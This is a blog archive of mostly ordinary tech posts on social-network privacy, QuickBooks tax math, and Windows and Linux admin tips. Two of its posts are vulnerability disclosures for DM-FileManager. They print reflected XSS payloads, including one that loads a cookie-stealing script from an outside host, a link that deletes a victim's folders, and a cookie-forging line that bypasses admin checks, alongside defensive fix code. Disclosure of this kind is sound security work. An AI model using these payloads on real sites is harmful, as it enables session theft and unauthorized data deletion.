nDarkness

Author Archive

Facebook’s Privacy Troubles on the Horizon

by on May.17, 2010, under Account information, Computer Security, Facebook, Privacy, Social Networking

Back in February of 2009 there was a big debate over the new terms of service that Facebook adopted. Due to the negative feedback over this decision, Facebook’s executives caved to the pressure and reverted to the old terms. Now, a little over a year later, the same group is at it again.

If you have a Facebook account and haven’t bothered to check your privacy settings lately, you may be surprised to learn just how much anyone and everyone can find out about you. Due to recent changes in the company’s privacy policy, more of your personal information is now easily accessible, and in more ways than you can imagine.

Facebook’s idea of privacy is that you, the user, have to police what you share. In other words, it is your responsibility to constantly check your privacy settings to see whether any changes have been made and to opt out of those changes if you don’t agree. I’m sure most of you would agree that there are better things to do with your time than constantly checking the privacy settings on a website.

Feel free to see for yourself:

  1. Once logged in, click on the ‘Account’ button and then ‘Privacy Settings’.
  2. Next click on ‘Applications and Websites’, then ‘What you Share’, and then the ‘this page’ link that is tucked away near the bottom of the page.
  3. Make sure you go through each application listed by clicking on ‘Edit Settings’ and secure them to your liking.
  4. Now, go back to the ‘Applications and Websites’ page and click on ‘What your friends can show about you’ to edit the options here as well.
  5. Finally, back on the ‘Applications and Websites’ page, click on the ‘Instant Personalization Pilot Program’ link and uncheck the box that allows Facebook partners to access your public information when you arrive on their websites.

Once you finish, ask yourself, should I really be forced to put up with this?


Should MySpace Be Put Out to Pasture?

by on May.13, 2010, under Myspace, Privacy, Social Networking, Software

For years I have heard many people talk about how MySpace has been losing popularity and that it will soon be gone. As of today, these predictions have yet to come true.

I can’t help but remember when everyone I knew was talking about this great new site called MySpace. I remember feeling like maybe I was missing the boat because I hadn’t bought into the hype of creating my account, customizing the page and reconnecting with all of my friends. Don’t get me wrong, I think the social networking phenomenon is a great concept and is obviously widely popular. Many starting bands have had great success using this medium to get their music out there for the world to hear, and we are able to communicate with friends and family all over the world for free. With that said, I don’t really regret not buying into this concept, I just regret not coming up with the idea first. Let’s face it, the idea of exploiting my members at every turn in order to make myself more money is just genius.

So why is it that MySpace is not as popular as it once was? Where did they go wrong and can they come back from their downward spiral? Well, to be honest, I’m not really sure and personally don’t even care.

The idea of putting my personal life out there for the world to see doesn’t appeal to me. Most people will agree that they like their privacy and are often offended when it is violated. However, these same people will put all of their information, pictures and videos out there for the world to see. I haven’t even begun to mention the spam and phishing attacks that have plagued these sites since their creation and that fool so many people daily. Does anyone see a problem here? What better playground for social engineering and identity theft can you ask for? It’s like a one-stop shop for all your criminal needs.

So what are your thoughts on the future of MySpace and/or social networking?


WordPress Sites Hacked in Bulk

by on May.10, 2010, under Computer Security, Linux, Privacy, Software

By now, I’m sure we have all heard about the numerous WordPress sites that have been hacked on several of the major hosting providers. From all of the reports so far, no one can seem to figure out what the problem is or how the breaches are happening.

Is the problem a server misconfiguration, an outdated WordPress install, weak passwords, or a serious bug in WordPress itself?

If your site has been hacked and you have access to the access_logs, post them along with any other relevant information that you have and as a community let’s go through the information to see if we can find the problem.
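As an added example (not something from the post or from the affected hosts), here is a small Python triage pass over constructed Apache-style access log lines. It pulls out two of the indicators worth checking first when someone posts their logs: repeated POSTs to wp-login.php from a single address, which points at password guessing, and requests for PHP files under wp-content/uploads, which points at a dropped web shell. The sample lines use documentation IP ranges and are made up; the threshold and the field names are assumptions.

```python
import re
from collections import Counter

# Apache/nginx "combined" format, with the referrer and user-agent fields left optional.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log (documentation address ranges), not real data from any hacked site.
SAMPLE_LOG = """\
203.0.113.5 - - [10/May/2010:03:12:01 -0500] "POST /wp-login.php HTTP/1.1" 200 3415
203.0.113.5 - - [10/May/2010:03:12:02 -0500] "POST /wp-login.php HTTP/1.1" 200 3415
203.0.113.5 - - [10/May/2010:03:12:03 -0500] "POST /wp-login.php HTTP/1.1" 200 3415
203.0.113.5 - - [10/May/2010:03:12:04 -0500] "POST /wp-login.php HTTP/1.1" 200 3415
203.0.113.5 - - [10/May/2010:03:12:05 -0500] "POST /wp-login.php HTTP/1.1" 200 3415
203.0.113.5 - - [10/May/2010:03:12:06 -0500] "POST /wp-login.php HTTP/1.1" 302 0
192.0.2.10 - - [10/May/2010:03:15:40 -0500] "GET /index.php HTTP/1.1" 200 5120
198.51.100.7 - - [10/May/2010:03:20:11 -0500] "GET /wp-content/uploads/2010/05/img.php?cmd=id HTTP/1.1" 200 88
198.51.100.7 - - [10/May/2010:03:21:02 -0500] "POST /wp-content/uploads/2010/05/img.php HTTP/1.1" 200 88
this line is not a log entry
"""


def triage(log_text: str, login_threshold: int = 5) -> dict:
    """First-pass indicators: login hammering per IP and executable files in uploads."""
    login_posts = Counter()      # ip -> number of POSTs to wp-login.php
    login_last_status = {}       # ip -> status of that ip's most recent login POST
    php_in_uploads = []          # (ip, target) for .php requests under wp-content/uploads
    unparsed = 0                 # lines the regex could not read; look at these by hand

    for line in log_text.splitlines():
        if not line.strip():
            continue
        m = LOG_RE.match(line)
        if not m:
            unparsed += 1
            continue
        ip, method, target, status = m["ip"], m["method"], m["target"], m["status"]
        path = target.split("?", 1)[0]

        # Many POSTs to the login form from one source: a failed WordPress login
        # re-renders the form (200); a success redirects (302), so a 302 after a run
        # of 200s suggests the password was eventually guessed.
        if method == "POST" and path == "/wp-login.php":
            login_posts[ip] += 1
            login_last_status[ip] = status

        # The uploads directory should hold media, never code that the server executes.
        if path.startswith("/wp-content/uploads/") and path.lower().endswith(".php"):
            php_in_uploads.append((ip, target))

    brute_force = {ip: (n, login_last_status[ip])
                   for ip, n in login_posts.items() if n >= login_threshold}
    return {"brute_force": brute_force, "php_in_uploads": php_in_uploads, "unparsed": unparsed}


if __name__ == "__main__":
    for key, value in triage(SAMPLE_LOG).items():
        print(key, value)
```

Run it against a real access_log by reading the file into `triage()`; anything it reports is a lead to chase, not a verdict, and the `unparsed` count tells you how much of the log the regex never looked at.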


Intuit QuickBooks Discount Error Goes Unfixed

by on May.06, 2010, under Mac OS X, Software, Utilities, Windows

Unless you live in a secluded cave in the middle of nowhere, you have undoubtedly heard of a little program called QuickBooks by Intuit. This program comes in a variety of different flavors to suit your personal and/or business needs. This software can be surprisingly simple to use with little to no effort.

In a few cases when I invoice a customer, I will charge them for a product at full price and then, a few lines down, discount the product to the agreed-upon selling price. This helps me demonstrate the value associated with the services I provide and also allows me to charge more later if the circumstances change. QuickBooks has a special item that is set up for this very discount function.

During my normal day-to-day operations, I received a phone call from a customer who was unable to determine how I had arrived at a sales tax figure. Thinking this was a simple error on the customer’s part, I pulled up the invoice, ran the figures and was shocked to realize that the math absolutely did not work. Wanting to get to the bottom of this, I asked to call the customer back and began trying to figure the problem out. After working on it for a few moments I remembered that my company has a full service plan and decided to call Intuit to report the problem. After jumping through several hoops and being transferred to a level 2 support member, I was told that this was expected behavior. The invoice in question had taxable and non-taxable items on it, with the discount appearing at the very bottom of the invoice. She explained that QuickBooks adds the items up as it goes along and, when it encounters a discount, treats it as a payment that reduces all of the previous line items by the same percentage.

Let’s see an example:

Our sales tax rate will be 8%.
One item that costs $1 and is taxable: $1 × 1.08 = $1.08
Another item for $1 that is not taxable: $1 × 1.00 = $1.00
A discount of $1 that is also taxable, so it removes $1.08: $1.08 + $1.00 - $1.08 = $1.00

Now here is a screen shot from QuickBooks with the same problem:

As you can see, QuickBooks figures this total to be $1.04. That number follows from the explanation above: the $1 discount is half of the $2 subtotal, so each earlier line is cut in half. The taxable item becomes $0.50 plus $0.04 tax and the non-taxable item becomes $0.50, for a total of $1.04 instead of $1.00. She then explained that the workaround was to enter all of the taxable items first, then the taxable discount, and finally the non-taxable items followed by a non-taxable discount if needed. I asked if this was going to be fixed and was told that I could submit it as a suggestion for a future version.
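As an added worked example (not from the post and not Intuit’s code), here are both calculations in Python. The line-by-line total is the one the post expects. The prorated total is my reconstruction of the behavior the support representative described, and is an assumption about how QuickBooks arrives at its figure rather than its actual algorithm; it reproduces the $1.04 on the original invoice and the $1.00 on the recommended ordering.

```python
from decimal import Decimal, ROUND_HALF_UP

TAX_RATE = Decimal("0.08")   # the 8% rate used in the example


def money(value: Decimal) -> Decimal:
    """Round to cents the way an invoice would."""
    return value.quantize(Decimal("0.01"), rounding=ROUND_HALF_UP)


# An invoice is a list of (amount, taxable) lines; a discount is a negative amount.
ORIGINAL_INVOICE = [           # the order the post describes: discount at the bottom
    (Decimal("1"), True),      # taxable item
    (Decimal("1"), False),     # non-taxable item
    (Decimal("-1"), True),     # taxable discount
]
WORKAROUND_INVOICE = [         # the order support recommended
    (Decimal("1"), True),      # taxable items first
    (Decimal("-1"), True),     # then the taxable discount
    (Decimal("1"), False),     # then the non-taxable items
]


def total_line_by_line(lines) -> Decimal:
    """The expected model: every line, discounts included, carries its own tax."""
    total = Decimal("0")
    for amount, taxable in lines:
        total += amount * (1 + TAX_RATE) if taxable else amount
    return money(total)


def total_prorated(lines) -> Decimal:
    """Assumed reconstruction of the support rep's description: a discount is
    spread over the lines entered before it by a single percentage, each of
    those lines keeps its own tax status, and tax is applied afterwards."""
    items = []                                  # running [amount, taxable] pairs
    for amount, taxable in lines:
        if amount >= 0:
            items.append([amount, taxable])
            continue
        subtotal = sum(a for a, _ in items)
        if subtotal == 0:
            continue                            # assumed guard: nothing to discount
        factor = (subtotal + amount) / subtotal  # $2 subtotal, $1 discount -> 0.5
        for item in items:
            item[0] *= factor
        # Note the discount's own taxable flag never matters in this model,
        # which is why entry order changes the total.
    total = Decimal("0")
    for amount, taxable in items:
        total += amount * (1 + TAX_RATE) if taxable else amount
    return money(total)


if __name__ == "__main__":
    print("expected:", total_line_by_line(ORIGINAL_INVOICE))     # 1.00
    print("prorated:", total_prorated(ORIGINAL_INVOICE))         # 1.04
    print("workaround:", total_prorated(WORKAROUND_INVOICE))     # 1.00
```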

This just goes to show you that you can’t always trust shiny software even if you pay for it and you should always double check your math.


DM-FileManager 3.9.9 XSS Vulnerability

by on Jan.30, 2010, under Computer Security

The nDarkness community has recently been working with the wonderful developers over at DutchMonkey.com to review and point out security flaws in some of their freely available software.

During this review process, there were several issues found and we will be posting them in the coming weeks for educational purposes. It is our hope that this information will be used to help others write more secure code and realize the dangers involved with these mistakes.

DM-FileManager 3.9.9 and below is vulnerable to reflected XSS: the message request parameter is written into the login page without being sanitized or encoded.

This example shows nDarkness.com in an iframe within the login page:

http://localhost/~safety/dm-filemanager/login.php?referrer=/&message=<p align=center><iframe src=http://ndarkness.com width=100% height=800></iframe></p>

Here is a url encoded version:

http://localhost/~safety/dm-filemanager/login.php?referrer=/&message=%3C%70%20%61%6C%69%67%6E%3D%63%65%6E%74%65%72%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%6E%64%61%72%6B%6E%65%73%73%2E%63%6F%6D%20%77%69%64%74%68%3D%31%30%30%25%20%68%65%69%67%68%74%3D%38%30%30%3E%3C%2F%69%66%72%61%6D%65%3E%3C%2F%70%3E

and one step further is the cookie stealer script:

http://localhost/~safety/dm-filemanager/login.php?referrer=/&message=<SCRIPT SRC=http://www.ndarkness.com/get-cookie.js></SCRIPT>

Here is a url encoded version:

http://localhost/~safety/dm-filemanager/login.php?message=%3C%53%43%52%49%50%54%20%53%52%43%3D%68%74%74%70%3A%2F%2F%62%6C%6F%67%2E%6E%64%61%72%6B%6E%65%73%73%2E%63%6F%6D%2F%67%65%74%2D%63%6F%6F%6B%69%65%2E%6A%73%3E%3C%2F%53%43%52%49%50%54%3E

A common way to exploit this would be to make up a bug report and alert the site owner to the situation, in the hope that they are logged in when they click the link above. The script would then send the victim’s cookie to the attacker, who uses it to hijack the user’s session.

Another option is to point the victim at the delete-folder command in ajax.php, which performs the deletion in response to a plain GET request, and let the user delete directories from their own site:

http://localhost/~safety/dm-filemanager/login.php?referrer=/&message=http://localhost/~safety/dm-filemanager/ajax.php?currdir=/safety/Sites/wp/&rmdir=yes&folder=/safety/Sites/wp/wp-admin&dir=wp-admin

DM-FileManager users should not follow untrusted links and should upgrade to the latest version.
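As an added example, not DM-FileManager’s own PHP, here is a Python stand-in for the part of login.php that prints the message parameter. It decodes the first URL-encoded payload above the way the server would, shows it landing in the page unchanged, and then shows the two fixes: HTML-encode the value on output (the PHP equivalent is htmlspecialchars with ENT_QUOTES) or, better, stop accepting free text and look the message up from a fixed table by key. The div wrapper and the message texts are assumptions.

```python
import html
from urllib.parse import parse_qs, urlparse

# Constructed from the first URL-encoded payload above; RAW_PAYLOAD is its plain form.
ENCODED_PAYLOAD = (
    "%3C%70%20%61%6C%69%67%6E%3D%63%65%6E%74%65%72%3E%3C%69%66%72%61%6D%65"
    "%20%73%72%63%3D%68%74%74%70%3A%2F%2F%6E%64%61%72%6B%6E%65%73%73%2E%63"
    "%6F%6D%20%77%69%64%74%68%3D%31%30%30%25%20%68%65%69%67%68%74%3D%38%30"
    "%30%3E%3C%2F%69%66%72%61%6D%65%3E%3C%2F%70%3E"
)
PAYLOAD_URL = ("http://localhost/~safety/dm-filemanager/login.php?referrer=/&message="
               + ENCODED_PAYLOAD)
RAW_PAYLOAD = ('<p align=center><iframe src=http://ndarkness.com width=100% height=800>'
               '</iframe></p>')


def message_from_url(url: str) -> str:
    """What login.php sees in $_GET['message']: the web server has already URL-decoded it."""
    params = parse_qs(urlparse(url).query, keep_blank_values=True)
    return params.get("message", [""])[0]


def render_vulnerable(message: str) -> str:
    """The behaviour described above: the parameter is printed into the page as-is."""
    return '<div class="message">' + message + '</div>'      # assumed wrapper markup


def render_escaped(message: str) -> str:
    """Fix 1: encode on output, so '<' arrives in the browser as '&lt;' and is never parsed
    as markup (htmlspecialchars($message, ENT_QUOTES) in PHP)."""
    return '<div class="message">' + html.escape(message, quote=True) + '</div>'


# Fix 2 (preferred): the URL carries only a key; the text comes from this fixed table.
KNOWN_MESSAGES = {                       # assumed texts, not DM-FileManager's own strings
    "bad_login": "Invalid username or password.",
    "logged_out": "You have been logged out.",
}


def render_keyed(key: str) -> str:
    """Unknown keys render an empty box, so attacker-chosen text never reaches the page."""
    text = KNOWN_MESSAGES.get(key, "")
    return '<div class="message">' + html.escape(text, quote=True) + '</div>'


if __name__ == "__main__":
    msg = message_from_url(PAYLOAD_URL)
    print("vulnerable:", render_vulnerable(msg))
    print("escaped:   ", render_escaped(msg))
    print("keyed:     ", render_keyed(msg), render_keyed("bad_login"))
```

Output encoding is the minimum fix; the keyed version also removes the ability to make the login page display arbitrary text at all, which closes off the phishing use of the same parameter.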


DM-FileManager 3.9.6 Cookie Injection and Authorization Bypass Vulnerability

by on Dec.09, 2009, under Computer Security, Privacy

The nDarkness community has recently been working with the wonderful developers over at DutchMonkey.com to review and point out security flaws in some of their freely available software.

During this review process, there were several issues found and we will be posting them in the coming weeks for educational purposes. It is our hope that this information will be used to help others write more secure code and realize the dangers involved with these mistakes.

The first major issue we found was with DM-Albums version 2.0. After reviewing that software and helping to add better support for WPMU installations, we moved on to DM-FileManager version 3.9.6. The first major issue we found with this software prompted us to take a deeper look at the authorization model used by this file manager. Below is the vulnerable code and the method used to exploit it. Please be aware that this has since been fixed and is no longer vulnerable in current versions.

I discovered that cookie values were being used to decide a user’s ability to access certain features of the software. The cookies that mattered were:

GROUP=ADMINISTRATORS; GROUPID=1;

The GROUPID cookie gives you the admin.php button (footer.php, line 49). Not necessary, but it was a start.

if($GROUPID == 1)
{
	print(" <a href=\"admin.php\" class=\"admin\"><img src=\"ui/$USERINTERFACE/png/admin.png\" border=\"0\" height=\"15\"/></a> ");
}

Being in the administrator group (admin.php, line 116) lets you use the admin.php page.

if($GROUP != "ADMINISTRATORS") redirect("/?currdir=$currdir");

To exploit this we used JavaScript injection. From the login page I entered the following in the address bar and reloaded the page:

javascript:void(document.cookie="GROUP=ADMINISTRATORS");void(document.cookie="GROUPID=1");

When the page reloaded, the admin button was in the footer of the page and it allowed me to use the admin.php page. Once in the admin interface you have full control of the file manager and can, for example, change the admin’s email address to yours and use the forgot-password feature to receive the admin’s unencrypted password (more on this issue in future posts).

All DM-FileManager users are strongly encouraged to upgrade their software to the latest version.
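As an added example, not the DutchMonkey code, here is a Python model of the authorization check from admin.php beside a hardened version that keeps the group on the server. The vulnerable function believes whatever GROUP value the browser sends, which is exactly what the javascript: line above forges. The hardened version hands the browser only an unguessable session id and looks the group up server-side (what PHP’s $_SESSION gives you), so forged GROUP and GROUPID cookies are simply ignored. The SESSID cookie name, the USERS group and the demo accounts are assumptions.

```python
import secrets
from http.cookies import SimpleCookie


def parse_cookie_header(header: str) -> dict:
    """Turn a raw Cookie: header into a name -> value dict."""
    jar = SimpleCookie()
    jar.load(header)
    return {name: morsel.value for name, morsel in jar.items()}


# Constructed: the Cookie: header a browser sends after the javascript: injection above.
FORGED_HEADER = "GROUP=ADMINISTRATORS; GROUPID=1"


def admin_allowed_vulnerable(cookie_header: str) -> bool:
    """Mirrors admin.php line 116: the client's own GROUP cookie decides."""
    cookies = parse_cookie_header(cookie_header)
    return cookies.get("GROUP") == "ADMINISTRATORS"


class SessionStore:
    """Server-side sessions: the browser holds an opaque id, never the group name."""

    def __init__(self):
        self._sessions = {}

    def login(self, username: str, group: str) -> str:
        # In real code this runs only after the password has been verified.
        sid = secrets.token_urlsafe(32)          # 256 bits of randomness; not guessable
        self._sessions[sid] = {"user": username, "group": group}
        return sid

    def lookup(self, sid: str):
        return self._sessions.get(sid)


def admin_allowed_hardened(store: SessionStore, cookie_header: str) -> bool:
    """Only the server's record for the presented session id decides; GROUP/GROUPID
    cookies, forged or not, are never consulted."""
    cookies = parse_cookie_header(cookie_header)
    session = store.lookup(cookies.get("SESSID", ""))   # SESSID is an assumed name
    return session is not None and session["group"] == "ADMINISTRATORS"


def demo() -> dict:
    """Run the forged header against both checks, plus a real admin session."""
    store = SessionStore()
    admin_sid = store.login("admin", "ADMINISTRATORS")   # assumed demo accounts
    user_sid = store.login("alice", "USERS")
    return {
        "forged_vs_vulnerable": admin_allowed_vulnerable(FORGED_HEADER),
        "forged_vs_hardened": admin_allowed_hardened(store, FORGED_HEADER),
        "forged_plus_user_session": admin_allowed_hardened(
            store, f"SESSID={user_sid}; {FORGED_HEADER}"),
        "real_admin_session": admin_allowed_hardened(store, f"SESSID={admin_sid}"),
    }


if __name__ == "__main__":
    for name, allowed in demo().items():
        print(f"{name}: {'admin' if allowed else 'denied'}")
```

The rule the fix embodies is that a cookie is user input: it can carry an identifier the server issued and can verify, but never the privilege itself.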


Windows XP Roaming Profile Synchronization Issues

by on Nov.09, 2009, under Windows

Roaming profiles let us access the files we use most often on any computer joined to the network, make it easy to replace old computers, and improve network security. On occasion, special circumstances cause the log-on/log-off synchronization of these profiles to fail. When this happens, the icon pictured fourth from the left below generally appears in the task bar.

Taskbar Image

When this happens, your roaming profile refuses to load or NetBIOS connections break, even after a reboot of the system. You are still able to connect to network shares if you use the IP address of the network computer(s). To correct this problem, go to My Computer => Tools => Folder Options => Offline Files. This will open the screen pictured below.

Offline Files Dialog

Now what you need to do is hold down Ctrl+Shift and click on Delete Files. Answer yes to the confirmation prompt, click ok and then restart your computer. After the restart, you will find that your profile loads normally and there are no more connection issues involving NetBIOS names.


Windows XP – Reclaim Lost Hard Drive Space

by on Nov.07, 2009, under Windows

The network I administer at work has an even mix of new and old computers. The problem with the older computers is their small hard drives and limited memory. I constantly have employees telling me that their computers are running slower than normal and that they are getting low-resources error messages.

Below are the steps I use to free up space on these machines:

  1. Click Start => My Computer
  2. Now we want to right click on the drive that Windows is installed on and click on Properties.
  3. Once the properties dialog opens, click on Disk Cleanup. (This will take a few seconds to minutes to load)

The next steps require a little more explanation.

Before we use Disk Cleanup to get rid of any files, let’s click on the More Options tab. This tab allows us to remove Windows components, installed programs that we don’t use, and old System Restore points. Assuming you have System Restore enabled, which it is by default, you will be able to regain a considerable amount of space with this option.

Look at the amount of free space you have and remember the number. Now click on the Clean Up button for System Restore and answer yes to the prompt. You will not see any progress bar or get confirmation that this operation has completed. Wait about 10 seconds and view your free space again. Did the number change? When I did this on my computer I regained a little over 3 gigs!

Now click back on the Disk Cleanup tab. This tab gives us a list of file types with the amount of space they take up plus their descriptions down below. Click on each one to find out what they do to help you decide if you should delete them or not. I typically delete everything except for Office setup files and I don’t compress old files. Once you have the files you want to remove selected click on ok and answer yes to the prompt.

That pretty much sums up the process I use to reclaim drive space on Windows XP machines.


Linux System Update Script

by on Nov.06, 2009, under Linux, Utilities

In my experience with the Linux distributions I use, Slackware and Ubuntu/Kubuntu, there are a couple of different ways to update the system. Of course we can always use a GUI to do the updates, but what fun is that?

The two commands used to update a Debian-based system are:

safety@nDarkness:~/bin$ sudo apt-get update; sudo apt-get upgrade

Now while this doesn’t require a great deal of typing, let’s see if we can shorten it to suit our needs.

If you do not already have somewhere to store your personal scripts, the following command will do this for you and allow you to enter the code we will use:

safety@nDarkness:~$ mkdir bin; cd bin; vi apt-auto

Press i for insert and create the following script:

#!/bin/bash
# Refresh the package index, then upgrade. '&&' (rather than ';') skips the
# upgrade if the update fails, so we never upgrade from a stale index.
sudo apt-get update && sudo apt-get upgrade

This is all we need for our script to produce the results we are looking for. Now let’s save it by pressing Esc, then typing :wq and pressing Enter.

To run our script we can type:

safety@nDarkness:~/bin$ bash ./apt-auto

You should see the output from the two commands used in the script printed to the screen. Now let’s make our script executable so we don’t have to type bash to make it run.

The following command will accomplish what we are looking for:

safety@nDarkness:~/bin$ chmod +x apt-auto

Now to run our command we simply need to type:

safety@nDarkness:~/bin$ ./apt-auto

We now have a working script for our update process, and it is significantly shorter than the command we started with. As always, all comments are welcome.


Microsoft Exchange Recovery Mode and How to Fix it

by on Nov.06, 2009, under Windows

I had a user this week who was experiencing trouble with Outlook. Every time they opened the program they received a prompt similar to the one below.

    Exchange is currently in recovery mode. You can either connect to your Exchange server using the network, work offline, or cancel this logon.

Not only was the prompt annoying, the shared calendar and contacts crashed the program whenever you tried to access them.

After doing some digging I found a solution that fixed the problem.

  1. Start Outlook and select Connect.
  2. On the Tools menu, click E-mail Accounts.
  3. Click View or change existing e-mail accounts, and then click Next.
  4. Click the Microsoft Exchange Server account, and then click Change.
  5. Click More Settings, and then click Advanced.
  6. Clear the Use Cached Exchange Mode check box, and then click Apply.
  7. Instead of exiting Outlook at this point click Offline Folder File Settings, and then click Disable Offline Use.
  8. Click Yes to the prompt, OK, Next, and Finish
  9. Close Outlook and start it again.
  10. Repeat steps 1-5
  11. Now reselect the Use Cached Exchange Mode check box, exit, and then restart Outlook.

That’s it; Outlook will no longer give the prompt and everything will be back to normal.

